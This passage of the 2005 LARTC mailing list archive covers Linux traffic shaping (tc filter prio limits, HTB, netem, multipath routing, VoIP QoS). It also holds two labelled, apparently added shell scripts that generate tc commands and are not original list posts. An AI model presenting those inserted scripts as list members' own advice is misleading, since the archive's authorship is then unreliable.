But I cannot find the qdisc that reacts like a bfifo or red qdisc but drops the oldest message of the queue when a drop is needed. Even better: a qdisc with an autodestruct algorithm for each frame in the queue that would garantee the "freshness" of each frame coming out. If you know of such qdiscs, please share. From mail2spj@yahoo.com Thu Jan 20 02:09:57 2005 From: mail2spj@yahoo.com (SPJ) Date: Wed, 19 Jan 2005 18:09:57 -0800 (PST) Subject: [LARTC] Interface not marked down when links are down Message-ID: <20050120020957.43586.qmail@web50108.mail.yahoo.com> Hi, I am not sure if this problem has already being posted, but I haven't found any solution. Excuse me if it's a repost but would appreciate any pointers. I have newly configured Multipath default route. I have 1 local connection and 4 internet connections. I am using kernel 2.6.7 and have applied Julian's relevent patches. When the next hop is down, julian's patch takes care of the links changing the route to only the links which it finds are up and forwarding traffic to those links. But if the problem is anywhere in between, beyond the next hop, the links are not marked identified as down (I down see the change in multipath default route) and requests still go via them and hence no connectivity, even if some other links are up. Does Julian's patch takes care of route only if next hop is down. Any solution to this problem? Thanks, SPJ __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com From gypsy@iswest.com Thu Jan 20 06:51:57 2005 From: gypsy@iswest.com (gypsy) Date: Wed, 19 Jan 2005 22:51:57 -0800 Subject: [LARTC] tc limit References: <41EE78F8.4826B6C8@iswest.com> Message-ID: <41EF550D.BF502865@iswest.com> Martin Schiøtz wrote: > > Thanks, with "prio #" on all filters - all rules can be added. > :-) You're welcome. > Just curious - Is there a reason for the ~2K limit on filters with "prio 0"? 
> > Martin No reason I'm aware of. Probably some OOPS! in the code that creates filters. Since I've never bothered to learn C, I've also never bothered to read the source code. So I'd never spot a programming mistake no matter how obvious, and I suspect that this one is very subtle. The real crime here is that the docs do not tell you that there is this trap that "everyone" with a lot of users falls into. > On Wed, 19 Jan 2005 07:12:56 -0800, gypsy wrote: > > Martin Schiøtz wrote: > > > > > > Hi > > > > Hello. > > > > > I have been playing with tc. I'm using htb and sfq. I tried to setup > > > shaping of every ip address within a /20. > > > I found that there must be an upper limit of about 2096 on the number > > > of rules (classes, qdiscs or filters). I was testing a /20 which gives > > > 4096 classes, qdiscs and filters. I'm using hashkey to optimize > > > processing of frames. > > > > Filters. > > > > > Is there a limit with tc or I'm I doing something wrong ? > > > > Yes, sort of. Yes. > > > > > This is the script: > > > #!/bin/sh > > > > > > > > /sbin/tc filter add dev eth1 parent 1:3 protocol ip u32 > > > > 'prio #' must be included in all 'filter' lines where "#" is not zero > > and is always the same; the "zero prio" has a limit and there is a limit > > on '#' - but no limit on how many times '#' can be (e.g.) 
5
> >
> > So, e.g.:
> > tc filter add dev eth1 parent 1: protocol ip prio 5 \
> >    u32 match ip src $IP flowid 1:40
> >
> > will run at least 64K times without complaint, but this will fail after
> > ~2K:
> > tc filter add dev eth1 parent 1: protocol ip prio 0 \
> >    u32 match ip src $IP flowid 1:40
> >
> > > /sbin/tc filter add dev eth1 parent 1:3 handle 3: protocol ip u32 divisor 256
> > > /sbin/tc filter add dev eth1 protocol ip parent 1: u32 match ip dst
> > > 10.0.0.0/20 hashkey mask 0x000000ff at 16 link 3:
> >
> > google LARTC please document
> >
> > gypsy

From lartc@draxinusom.ch Thu Jan 20 07:25:20 2005
From: lartc@draxinusom.ch (Rene Gallati)
Date: Thu, 20 Jan 2005 08:25:20 +0100
Subject: [LARTC] Interface not marked down when links are down
In-Reply-To: <20050120020957.43586.qmail@web50108.mail.yahoo.com>
References: <20050120020957.43586.qmail@web50108.mail.yahoo.com>
Message-ID: <41EF5CE0.2040501@draxinusom.ch>

SPJ wrote:
> I am not sure if this problem has already being
> posted, but I haven't found any solution. Excuse me if
> it's a repost but would appreciate any pointers.
> I have newly configured Multipath default route. I
> have 1 local connection and 4 internet connections. I
> am using kernel 2.6.7 and have applied Julian's
> relevent patches.
> When the next hop is down, julian's patch takes care
> of the links changing the route to only the links
> which it finds are up and forwarding traffic to those
> links. But if the problem is anywhere in between,
> beyond the next hop, the links are not marked
> identified as down (I down see the change in multipath
> default route) and requests still go via them and
> hence no connectivity, even if some other links are
> up.
> Does Julian's patch takes care of route only if next
> hop is down. Any solution to this problem?

You are looking at the wrong layer.
If the next hop is unreachable,
which is a layer 2 thing, the system notices this and acts accordingly.
If however a link further away is down, there is no such mechanism on
layer 2 and your system cannot react to it (with standard means).

This is quite "psychic" if you want. Why should your system magically
know there is a problem 4 hops upstream ? It only sees the links it is
directly attached. The packets are accepted on one link and this is
where the responsibility of your multihomed system ends. It neither does
nor should track packets over the full path from source to destination.

There is a solution however: For that kind of thing you need to look
into routing software (BGP, OSPF) which has this capability. If you
don't control the upstream machines, you will need to get a bgp-peering
with your upstream provider to be able to react to outages. If your
mentioned 4 connections are standard home-adsl/cable connections, this
might be difficult however.

Hope that helps.

--
C U

     - -- ---- ----- -----/\/  René Gallati  \/\---- ----- --- -- -

From DurgaPrasad Adusumalli Thu Jan 20 09:45:41 2005
From: DurgaPrasad Adusumalli (DurgaPrasad Adusumalli)
Date: Thu, 20 Jan 2005 15:15:41 +0530
Subject: [LARTC] Bandwidth Management Scripts
Message-ID: <75b657f40501200145221ceef9@mail.gmail.com>

I am a newbie to bandwidth management and trying to manage bandwidth
with classbased queuing using HTB (Hierarchical Token Bucket) as this
is simple and more efficient. In this process, I am trying to write a
config file that helps in managing queuing rules easy. Can anyone help
me with this.
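
[Added example, not code posted by any list member.] For the "tc limit" thread above (Martin Schiøtz's per-host script for a /20 and gypsy's reply that every filter line needs the same non-zero 'prio #'): a POSIX sh generator that prints the class, sfq and hashed u32 filter commands with an explicit prio, plus a check that counts filter lines lacking one. It only prints commands and never runs tc. DEV, PRIO, RATE, UPLINK, the function names, the classid offset of 16, attaching every filter to parent 1: and skipping the network and broadcast addresses are assumptions of this example.

```shell
#!/bin/sh
# Added example: generates tc commands as text; nothing is sent to the kernel.
DEV=eth1        # assumption: shaping device, as in the thread's script
PRIO=5          # assumption: the one non-zero prio shared by all filters
RATE=512kbit    # per-host rate, as in the thread's script
UPLINK=34mbit   # parent class rate, as in the thread's script

# Constructed sample (modelled on lines quoted in the thread) for the check below.
SAMPLE_SCRIPT='/sbin/tc filter add dev eth1 parent 1:3 protocol ip u32
/sbin/tc filter add dev eth1 protocol ip parent 1:3 u32 ht 3:1: match ip dst 10.0.0.1 flowid 1:13
tc filter add dev eth1 parent 1: protocol ip prio 0 u32 match ip src 10.0.0.9 flowid 1:40
tc filter add dev eth1 parent 1: protocol ip prio 5 u32 match ip src 10.0.0.9 flowid 1:40'

# ip_to_int A.B.C.D -> 32-bit integer
ip_to_int() {
    oldifs=$IFS
    IFS=.
    set -- $1
    IFS=$oldifs
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# int_to_ip N -> dotted quad
int_to_ip() {
    echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

# host_rules IP INDEX: class + sfq + hashed filter for one host.
# tc reads classid minors as hex, so the minor is printed in hex.
# The hash bucket is the last octet of the address (mask 0x000000ff).
host_rules() {
    ip=$1
    minor=$(printf '%x' $(( 16 + $2 )))
    bucket=$(printf '%x' $(( $(ip_to_int "$ip") & 255 )))
    echo "tc class add dev $DEV parent 1:3 classid 1:$minor htb rate $RATE ceil $RATE"
    echo "tc qdisc add dev $DEV parent 1:$minor handle $minor: sfq perturb 4"
    echo "tc filter add dev $DEV parent 1: protocol ip prio $PRIO u32 ht 3:$bucket: match ip dst $ip flowid 1:$minor"
}

# subnet_rules NETWORK PREFIXLEN: full rule set for every host address.
subnet_rules() {
    size=$(( 1 << (32 - $2) ))
    base=$(( $(ip_to_int "$1") & ~(size - 1) ))
    echo "tc qdisc add dev $DEV root handle 1: htb"
    echo "tc class add dev $DEV parent 1: classid 1:3 htb rate $UPLINK ceil $UPLINK"
    echo "tc filter add dev $DEV parent 1: protocol ip prio $PRIO u32"
    echo "tc filter add dev $DEV parent 1: protocol ip prio $PRIO handle 3: u32 divisor 256"
    echo "tc filter add dev $DEV parent 1: protocol ip prio $PRIO u32 match ip dst $(int_to_ip "$base")/$2 hashkey mask 0x000000ff at 16 link 3:"
    i=1
    while [ "$i" -le $(( size - 2 )) ]; do
        host_rules "$(int_to_ip $(( base + i )))" "$i"
        i=$(( i + 1 ))
    done
}

# count_unpinned_filters: read a tc script on stdin and print how many
# "tc filter add" lines carry no "prio N" / "pref N" with N >= 1.
count_unpinned_filters() {
    awk '
        /tc filter add/ {
            ok = 0
            for (i = 1; i < NF; i++)
                if (($i == "prio" || $i == "pref") && $(i + 1) + 0 > 0) ok = 1
            if (!ok) n++
        }
        END { print n + 0 }'
}

# Usage: sh thisfile 10.0.0.0 20 > rules.sh
if [ "$#" -eq 2 ]; then
    subnet_rules "$1" "$2"
fi
```

Piping an existing shaping script through count_unpinned_filters before loading it shows how many filter lines would fall under the "zero prio" case described in the thread.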
From igogu@umsoft.ro Thu Jan 20 09:56:25 2005 From: igogu@umsoft.ro (Ionut Gogu) Date: Thu, 20 Jan 2005 11:56:25 +0200 Subject: [LARTC] Bandwidth Management Scripts References: <75b657f40501200145221ceef9@mail.gmail.com> Message-ID: <001c01c4fed6$4ddad520$340aa8c0@unix> Hello You can use a set of tools : htb_tools 0.2.5 for bandwidth management, bandwidth statistics ; Documentation and HowTo you can find at www.arny.ro/htb , a set of configurations file/exemple etc; For more informations please contact me; http://www.arny.ro/htb/htb_tools-0.2.5/docs/HowTo/htb_tools-howto-ro.html ----- Original Message ----- From: "DurgaPrasad Adusumalli" To: Sent: Thursday, January 20, 2005 11:45 AM Subject: [LARTC] Bandwidth Management Scripts >I am a newbie to bandwidth management and trying to manage bandwidth > with classbased queuing using HTB (Hierarchical Token Bucket) as this > is simple and more efficient. In this process, I am trying to write a > config file that helps in managing queuing rules easy. Can anyone help > me wiith this. > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ From raptor@tvskat.net Thu Jan 20 11:53:18 2005 From: raptor@tvskat.net (raptor@tvskat.net) Date: Thu, 20 Jan 2005 13:53:18 +0200 Subject: [LARTC] more than one cpu Message-ID: <20050120135318.78990403@bugs> hi, Is there benefit of running 2 cpus box for shaper ? ----- http://linuxtoday.com/news_story.php3?ltsn=2004-12-08-004-32-OS-BZ-DT-0005 snip> MS Office is popular in the same way as heart disease is the most popular way to die. From Adolf Nepolean Raj Thu Jan 20 11:54:15 2005 From: Adolf Nepolean Raj (Adolf Nepolean Raj) Date: Thu, 20 Jan 2005 17:24:15 +0530 Subject: [LARTC] i want to know about tol in tcp/ip Message-ID: hello sir.. I am adolf and i am doing my final year engineering in NIT-Trichy. I am going to do my project in job scheduling. 
Fot that i want to know that how to extract the tol from the tcp/ip and some more details of that. It will be very helpful for my project. Bye. ADOLF. From ajpearce@ajpearce.co.uk Thu Jan 20 22:07:06 2005 From: ajpearce@ajpearce.co.uk (ajpearce) Date: Thu, 20 Jan 2005 22:07:06 +0000 Subject: [LARTC] Hardware solution? (or v.easy software fix instead) Message-ID: <27251cb80501201407a89427a@mail.gmail.com> I'm moving to a new place and my new flatmate wants a router because he likes the cleaness of it all in a non geeky way which I can understand. This means it's going to be hard for me to pursude him to let me run a computer as a router to act as bandwidth cop. But I don't fancy trying to use ssh, VNC and games while he's using WindowsUpdate or p2p. So I need an answer to avoid arguments. - Is there a plush hardware solution to the problem? As a backup I've been looking into bandwidth scripts for an easy and sure way to do the job. I've tried using htb.init and a smoothwall module to do it but neither seemed to work. Now, I could spend ages trying to get it working and so forth but when it comes to this I'm sharing with someone else so I need something that will work brilliantly and straight off. If I go for the computer option and I'm able to pull it off I might as well make it a fileserver and use it as a single computer to download stuff on (so bittorrent, eDonkey and so we have 1 computer left on and not 3. If so what approach would you take for this? Use my own setup but binary parts to be sure it will work including kernel, iptables and iproute? - or should I take a distro setup for this and add stuff to that instead? I need: - samba - as many p2p programs as possible - maybe other server software - something to download with, say wget What would be your approach to this? I want to find a solution that involves less steps to make mistakes on because I haven't had it working properly yet. 
Here are some links to scripts and the like I found in order of interest: http://www.smidsrod.no/products/firewall/supershaper/ http://www.metamorpher.de/fairnat/ #complex but hopeful: http://www.digriz.org.uk/jdg-qos-script/#howitworks http://users.skynet.be/cbqinit/ http://www.chronox.de/tc+filter/limit.conn-0.2.bz2 http://www.freenet.org.nz/python/pyshaper/#screenshot #proxy based limiter: http://www.stewart.com.au/ip_relay/ #comphrehensive: http://bwm-tools.pr.linuxrulz.org/ From jasonb@edseek.com Thu Jan 20 22:21:00 2005 From: jasonb@edseek.com (Jason Boxman) Date: Thu, 20 Jan 2005 17:21:00 -0500 Subject: [LARTC] Hardware solution? (or v.easy software fix instead) In-Reply-To: <27251cb80501201407a89427a@mail.gmail.com> References: <27251cb80501201407a89427a@mail.gmail.com> Message-ID: <200501201721.00234.jasonb@edseek.com> On Thursday 20 January 2005 17:07, ajpearce wrote: > So I need an answer to avoid arguments. > > - Is there a plush hardware solution to the problem? You could always get one of those Linksys routers that runs Linux and configure Linux traffic control on it. > If I go for the computer option and I'm able to pull it off I might as > well make it a fileserver and use it as a single computer to download > stuff on (so bittorrent, eDonkey and so we have 1 computer left on and > not 3. If so what approach would you take for this? Use my own setup > but binary parts to be sure it will work including kernel, iptables > and iproute? - or should I take a distro setup for this and add stuff > to that instead? I need: L7-Filter hasn't been picking up Kademilia so filtering eDonkey tends to be difficult. ipp2p might be better about this, but I haven't tried it. I just filter based on IP for p2p since I only have a single box that does any p2p. > http://www.metamorpher.de/fairnat/ fairnat ought to let you share bandwidth out between groups of machines, so you and your roommate ought to be able to split up the bandwidth. 
From ajpearce@ajpearce.co.uk Thu Jan 20 23:17:38 2005 From: ajpearce@ajpearce.co.uk (ajpearce) Date: Thu, 20 Jan 2005 23:17:38 +0000 Subject: [LARTC] Hardware solution? (or v.easy software fix instead) In-Reply-To: <200501201721.00234.jasonb@edseek.com> References: <27251cb80501201407a89427a@mail.gmail.com> <200501201721.00234.jasonb@edseek.com> Message-ID: <27251cb805012015176990075b@mail.gmail.com> The linksys linux router sounds ideal. Has anyone setup bandwidth management on it before though? Sounds like a tall order? On Thu, 20 Jan 2005 17:21:00 -0500, Jason Boxman wrote: > On Thursday 20 January 2005 17:07, ajpearce wrote: > > > So I need an answer to avoid arguments. > > > > - Is there a plush hardware solution to the problem? > > You could always get one of those Linksys routers that runs Linux and > configure Linux traffic control on it. > > > > If I go for the computer option and I'm able to pull it off I might as > > well make it a fileserver and use it as a single computer to download > > stuff on (so bittorrent, eDonkey and so we have 1 computer left on and > > not 3. If so what approach would you take for this? Use my own setup > > but binary parts to be sure it will work including kernel, iptables > > and iproute? - or should I take a distro setup for this and add stuff > > to that instead? I need: > > L7-Filter hasn't been picking up Kademilia so filtering eDonkey tends to be > difficult. ipp2p might be better about this, but I haven't tried it. I just > filter based on IP for p2p since I only have a single box that does any p2p. > > > > http://www.metamorpher.de/fairnat/ > > fairnat ought to let you share bandwidth out between groups of machines, so > you and your roommate ought to be able to split up the bandwidth. 
From Robert Kurjata Fri Jan 21 09:02:21 2005
From: Robert Kurjata (Robert Kurjata)
Date: Fri, 21 Jan 2005 10:02:21 +0100
Subject: Re[2]: [LARTC] Hardware solution? (or v.easy software fix instead)
In-Reply-To: <27251cb805012015176990075b@mail.gmail.com>
References: <27251cb80501201407a89427a@mail.gmail.com> <200501201721.00234.jasonb@edseek.com> <27251cb805012015176990075b@mail.gmail.com>
Message-ID: <129545270.20050121100221@ire.pw.edu.pl>

Hello ajpearce,

In your message dated 21 January 2005 (00:17:38) one can read:

Slightly OT but,

For a Linksys wireless router (WRT54G) there are perfect solutions
using wondershaper + iproute2 in an alternative firmwares. Also you
can build your own firmware cause a build environment just works.

Look at http://www.portless.net/menu/ewrt/ as a starting point, links
at the end will drive you to the all important places.

From my experience: kernel 2.4.20 + iproute2 + wondershaper + ebtables +
iptables + vconfig are just ready waiting for use.

> The linksys linux router sounds ideal. Has anyone setup bandwidth
> management on it before though? Sounds like a tall order?

[snip]

--
Regards,
Robert Kurjata

From ajpearce@ajpearce.co.uk Fri Jan 21 19:26:20 2005
From: ajpearce@ajpearce.co.uk (ajpearce)
Date: Fri, 21 Jan 2005 19:26:20 +0000
Subject: Re[2]: [LARTC] Hardware solution?
(or v.easy software fix instead)
In-Reply-To: <129545270.20050121100221@ire.pw.edu.pl>
References: <27251cb80501201407a89427a@mail.gmail.com> <200501201721.00234.jasonb@edseek.com> <27251cb805012015176990075b@mail.gmail.com> <129545270.20050121100221@ire.pw.edu.pl>
Message-ID: <27251cb805012111263849b8fa@mail.gmail.com>

I am considering this. But we will also be using a cable modem. I
wondered if I could even get the cable modem to do CBQ as well with
something like sigma! Just a thought though.

On Fri, 21 Jan 2005 10:02:21 +0100, Robert Kurjata wrote:
> Hello ajpearce,
>
> In your message dated 21 January 2005 (00:17:38) one can read:
>
> Slightly OT but,
>
> For a Linksys wireless router (WRT54G) there are perfect solutions
> using wondershaper + iproute2 in an alternative firmwares. Also you
> can build your own firmware cause a build environment just works.
>
> Look at http://www.portless.net/menu/ewrt/ as a starting point, links
> at the end will drive you to the all important places.
>
> From my experience: kernel 2.4.20 + iproute2 + wondershaper + ebtables +
> iptables + vconfig are just ready waiting for use.
>
> > The linksys linux router sounds ideal. Has anyone setup bandwidth
> > management on it before though? Sounds like a tall order?
>
> [snip]
>
> --
> Regards,
> Robert Kurjata

From wwickersham@printinc.com Fri Jan 21 21:49:25 2005
From: wwickersham@printinc.com (Walter Wickersham)
Date: Fri, 21 Jan 2005 13:49:25 -0800
Subject: [LARTC] equal cost multipath routing and incoming services...
Message-ID: <8A1DA40786CE4741850C0AF80F2D525602F76A0B@idealab.printperpage.com>

We're trying to figure out how to have equal cost multipath routing
using OSPF (quagga) and have come up with the following...

Has anyone done something similar? -- How do you deal with incoming
services (mail/web/etc) in such a scenario as below - And does anyone
have any suggestions?

There's more detail below....

Diagram and overview:

Network A connects to Core1 and Core2 via 100mbit ethernet, and uses a
virtual default gateway IP address provided by UCARP.

Core1 and Core2 are each connected to Border1 and Border2 via 100mbit
ethernet links.

Border1 is connected to ISP1 via a T1, same thing with Border2 and ISP2.

Remote1 is on a T1, Remote2 is on a DSL line.

Each remote router connects via IPSec to both Border1 and Border2. We run
GRE tunnels over these IPSec connections and route traffic over the GRE
tunnels using OSPF with Quagga. This allows us to do failover and load
balancing.

The core router tier does not exist right now. We want to put it in place
so that the OSPF costs will be the same for either path to each remote
site.

We desire to continue to have incoming services hosted by servers on
Network A.
While packets will come in from, say, ISP1, be NAT'd by border1, and arrive at the server on Network A without a problem, we need to ensure that core1 and core2 route those return packets to border1 instead of border2. Likewise for the services we want to host using ISP2. [Network A] | | [core1] [core2] | \ / | | \ / | | X | | / \ | | / \ | [border1] [border2] | | ISP1 ISP2 | | \ / ( The Internet ) / \ | | ISP3 ISP4 (Networks D through P | | not shown for clarity) [remote1] [remote2] | | [Network B] [Network C] From pankaj@toughguy.net Sat Jan 22 05:45:27 2005 From: pankaj@toughguy.net (Pankaj Agarwal) Date: Sat, 22 Jan 2005 11:15:27 +0530 Subject: [LARTC] help regarding seeting up multiple gateway on linux Message-ID: <004a01c50045$96df7ee0$8d00150a@dreammac> This is a multi-part message in MIME format. ------=_NextPart_000_0047_01C50073.ACD49860 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi All, I need a little help and guidance from you all. Actually i am facing too = problems. One is whenever I change default gateway by issuing route = coomand ...my system works as the way i want it to...but after restart = it it reads the old gateway IP...where I'm wrong? Other thing is I am = trying to configure my server for multipath routing...but i am unable to = do so... when I issue command as "ip route add dev devname = src ip table tabname" it gives me a rtnetlink error...Kindly share with = me your experinces on setting up multiple gateways... I have used = aliasing eth0:0 style for the dev on which both os the gateways are = configured.. waiting/expecting for a lot of email replies to my query.. Thanks and Regards, Pankaj ------=_NextPart_000_0047_01C50073.ACD49860 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hi All,

I need a little help and guidance from you all. Actually I am facing two
problems. One is whenever I change the default gateway by issuing the route
command ... my system works the way I want it to ... but after a restart
it reads the old gateway IP ... where am I wrong? The other thing is I am
trying to configure my server for multipath routing ... but I am unable to
do so ... when I issue the command as "ip route add <network/bit> dev devname
src ip table tabname" it gives me an rtnetlink error ... Kindly share with
me your experiences on setting up multiple gateways ... I have used aliasing
eth0:0 style for the dev on which both of the gateways are configured.

Waiting/expecting a lot of email replies to my query.

Thanks and Regards,

Pankaj

From vinaymathew80@yahoo.com Sat Jan 22 13:46:19 2005
From: vinaymathew80@yahoo.com (vinay mathew)
Date: Sat, 22 Jan 2005 05:46:19 -0800 (PST)
Subject: [LARTC] network emulation
Message-ID: <20050122134619.18266.qmail@web50407.mail.yahoo.com>

hi,
I am really a newbie in linux traffic control. But I have a task to implement a tool similar to
the nistnet tool used for network emulation tests but which emulates a wireless environment.
I was exploring the use of the traffic control subsystem for this task. In this regard I have
a few questions I need to post in order to clarify my thoughts on how to do this. I am using
tcng to classify traffic and generate the commands necessary to set up the traffic control
structures.

1. A simple task to add say a delay of 10ms to packets going to a particular destination. I
tried this using a simple fifo queue and a tbf queue but was not able to obtain the required
results. The queue parameters don't have an explicit delay/latency parameter so basically I
want to know how to add a delay/latency to packets going out through a particular interface.
A simple script that I tried:
dev INTERFACE{
 egress{
  class(<$latency>) if ip_dst == 10.0.0.14;
  class(<$other>) if 1;
  
  prio{
   $latency=class {
   //how to set these parameters here to achieve the required delay
    tbf(limit 10kB, rate 20kbps, burst 2 kB, mtu 1500B);
   }
   $other=class {
    fifo(limit 10kB);
   }
  }
 }
}
 
2. The second part is similar to the first but involves dropping a percentage of packets
instead of adding a delay to them. Example: I need a 10% packet drop for packets coming from
source 1 and heading to dest 2. Example: I use a simple fifo queue with a limit of 2 kB in
order to just test random drop capability. When I use the ping utility with a packet size
greater than 2kB I get the message that 0 packets sent and 0 packets received and when the
packet sizes are < 2048 bytes then there is no drop or delay at all. Any ideas on this one?

3. To implement bandwidth sharing among different hosts. Example: 4 hosts are communicating
to each other and all traffic between them is routed through a router which is like the
bottleneck and acts as the wireless network environment with the bottleneck capacity as the
known wireless link capacity. I was thinking and am currently trying this using the HTB
queuing discipline. I wanted to know if this idea can be effectively implemented using the
HTB queuing discipline.

Also I'm having some problems with installation and working of tcng on my Suse 9.2 system
which is running with a 2.6.8 kernel version. Ok, the simulator could not be compiled. But
when I tried using the commands generated by the tcng compiler I get the error that dsmark
queuing discipline is not supported. However when I use the root keyword using the tc tool
there seems to be no problem. I read that root and dsmark are the same ... or am I wrong
about this. Also my kernel has all the parameters enabled for QoS support. I tried compiling
iproute2 from source but I'm not able to since I'm getting errors while compiling. Can anyone
throw some light on this? Or is it that there are some compatibility problems with the newer
2.6 kernels.
I'm sorry for the long content of the mail. But I'm a newbie and want to get my thoughts right
on this and whether it's possible. Thanks a million in advance.
regards
vinay

From david_list@boreham.org Sat Jan 22 17:00:15 2005
From: david_list@boreham.org (David Boreham)
Date: Sat, 22 Jan 2005 09:00:15 -0800
Subject: [LARTC] network emulation
References: <20050122134619.18266.qmail@web50407.mail.yahoo.com>
Message-ID: <078301c500a3$d82af3d0$da529145@mtbrook.bozemanpass.com>

 
> I am really a newbie in linux traffic control. But I have a task to implement a tool similar to
> the nistnet tool used for network emulation tests but which emulates a wireless environment.

Interesting project. I'd suspect that 90% of the effort will be in determining
models for wireless path characteristics ;)

> 1. A simple task to add say a delay of 10ms to packets going to a particular destination. I

http://developer.osdl.org/shemminger/netem/

> 2. The second part is similar to the first but involves dropping a percentage of packets
> instead of adding a delay to them. Example: I need a 10% packet drop for packets coming from

netem will do this too.

> 3. To implement bandwidth sharing among different hosts. Example: 4 hosts are communicating
> to each other and all traffic between them is routed through a router which is like the
> bottleneck and acts as the wireless network environment with the bottleneck capacity as the
> known wireless link capacity. I was thinking and am currently trying this using the HTB
> queuing discipline. I wanted to know if this idea can be effectively implemented using the
> HTB queuing discipline.

Probably. You might try using imq devices with HTB to get the traffic
to go through the shaper the way you want. Real wireless networks have
quite complex characteristics though, which I suspect will require custom code.
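
The netem setup pointed to in the reply above, written out for the two cases in the question (a 10 ms delay and a 10% loss, applied only to traffic for 10.0.0.14). This is an added example, not part of the original posts; the function names, the APPLY switch and the four-band prio layout that holds the netem leaf are assumptions. Arguments are validated because the generated commands are meant to be run as root.

```shell
#!/bin/sh
# Added example, not from the thread. Function names, the APPLY switch and the
# four-band prio layout are assumptions made for this sketch.

TC=${TC:-/sbin/tc}

# Print each tc command; execute it only when APPLY=1 (needs root and sch_netem).
run_tc() {
    if [ "${APPLY:-0}" = "1" ]; then
        "$TC" "$@"
    else
        echo "$TC $*"
    fi
}

# Succeeds only for a non-negative decimal integer of at most five digits.
is_uint() {
    case $1 in
        ''|*[!0-9]*|??????*) return 1 ;;
    esac
    return 0
}

# Succeeds only for a dotted quad whose four octets are each 0-255.
valid_ipv4() {
    case $1 in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    old_ifs=$IFS
    IFS=.
    set -- $1
    IFS=$old_ifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "${#octet}" -le 3 ] || return 1
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# netem_for_dst DEV DST DELAY_MS LOSS_PCT
# Delay and/or drop only the packets leaving DEV for DST.
netem_for_dst() {
    dev=$1 dst=$2 delay_ms=$3 loss_pct=$4

    case $dev in
        ''|*[!A-Za-z0-9._-]*) echo "bad device name" >&2; return 1 ;;
    esac
    valid_ipv4 "$dst"   || { echo "bad destination address" >&2; return 1; }
    is_uint "$delay_ms" || { echo "delay must be an integer (ms)" >&2; return 1; }
    is_uint "$loss_pct" || { echo "loss must be an integer (%)" >&2; return 1; }
    [ "$loss_pct" -le 100 ] || { echo "loss must be 0-100" >&2; return 1; }

    netem_args=""
    if [ "$delay_ms" -gt 0 ]; then netem_args="delay ${delay_ms}ms"; fi
    if [ "$loss_pct" -gt 0 ]; then netem_args="$netem_args loss ${loss_pct}%"; fi
    [ -n "$netem_args" ] || { echo "nothing to emulate" >&2; return 1; }

    # 1. prio with a fourth band: the default priomap only uses bands 1:1-1:3,
    #    so 1:4 receives nothing except what the filter below sends to it.
    run_tc qdisc add dev "$dev" root handle 1: prio bands 4 &&
    # 2. netem as the leaf of that band carries the delay and the loss.
    run_tc qdisc add dev "$dev" parent 1:4 handle 40: netem $netem_args &&
    # 3. u32 filter steering the one destination into the netem band.
    run_tc filter add dev "$dev" protocol ip parent 1:0 prio 1 \
        u32 match ip dst "$dst/32" flowid 1:4
}
```

Calling `netem_for_dst eth0 10.0.0.14 10 10` prints the three commands; with `APPLY=1` they are executed, and `tc qdisc del dev eth0 root` removes the setup again.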
 
 
From riccardo@e4a.it Sat Jan 22 17:15:17 2005
From: riccardo@e4a.it (Riccardo Losselli)
Date: Sat, 22 Jan 2005 18:15:17 +0100
Subject: [LARTC] Info about VoiP Qos
Message-ID: <41F28A25.1030108@e4a.it>

Hi,
I've been working on VoIP QoS in the few weeks.
I shape IAX2 and SIP, and I'm getting some interesting results.
I'm using HTB, the line is a 512Kbps dedicated line, and we have some servers
on the same line that generate quite a lot of traffic, frequently
saturating the link.
I've read through the LARTC howto, examples, etc., and so far I'm at this point:

I can shape the servers' traffic, based on IP and services
I can shape the VoIP traffic
If I reserve some bandwidth for VoIP and the rest for server traffic, it
all runs smooth

This setup works by creating a root disc, then two "source" disc, one
rated at 100 Kbps for VoIP, one rated 300Kbps. The remaining 100Kbps is
"wasted" to avoid buffering from the router.

But I would like to have the possibility to use all the 400Kbps and slow
down server traffic only when and if needed.
I prioritized VoIP traffic, using the various scripts around, and what I
get is that, even if VoIP quality is definitely much much better than
without shaping, there are still statics and pops, and some
interruption of the voice, and only if I'm called from POTS.
I do not get this when completely reserving the bandwidth or when the
link is not loaded.

I would like to ask if this is a normal behaviour before keeping to try
to understand if I missed something somewhere..
If it's not normal I would post my script and ask for a suggestion.
BTW I get the same results when using wondershaper and so on.

Thanks,
Ricky

From jasonb@edseek.com Sat Jan 22 18:11:32 2005
From: jasonb@edseek.com (Jason Boxman)
Date: Sat, 22 Jan 2005 13:11:32 -0500
Subject: [LARTC] Info about VoiP Qos
In-Reply-To: <41F28A25.1030108@e4a.it>
References: <41F28A25.1030108@e4a.it>
Message-ID: <200501221311.32569.jasonb@edseek.com>

On Saturday 22 January 2005 12:15, Riccardo Losselli wrote:
> i would like to ask if this is a normal behaviour before keeping to try
> to understand if i missed something somewhere..
> if it's not normal i would post my script and ask for a suggestion.
> BTW i get the same results when using wondershaper and so on.

What I found most helpful, when things were not working as I thought I had
configured them to, was to graph for a duration and compare the incidents
with the graph output. If you can pinpoint spikes on the graph or other
events with VoIP issues, you might see if your configuration is at fault.

( Shameless plug:
http://trekweb.com/~jasonb/articles/traffic_shaping/monitoring.html )

--
Jason Boxman
Perl Programmer / *NIX Systems Administrator
Shimberg Center for Affordable Housing | University of Florida
http://edseek.com/ - Linux and FOSS stuff

From riccardo@e4a.it Sat Jan 22 20:03:06 2005
From: riccardo@e4a.it (Riccardo Losselli)
Date: Sat, 22 Jan 2005 21:03:06 +0100
Subject: [LARTC] Info about VoiP Qos
In-Reply-To: <200501221311.32569.jasonb@edseek.com>
References: <41F28A25.1030108@e4a.it> <200501221311.32569.jasonb@edseek.com>
Message-ID: <41F2B17A.7070203@e4a.it>

| What I found most helpful, when things were not working as I thought I had
| configured them to, was to graph for a duration and compare the incidents
| with the graph output. If you can pinpoint spikes on the graph or other
| events with VoIP issues, you might see if your configuration is at fault.
|
| ( Shameless plug:
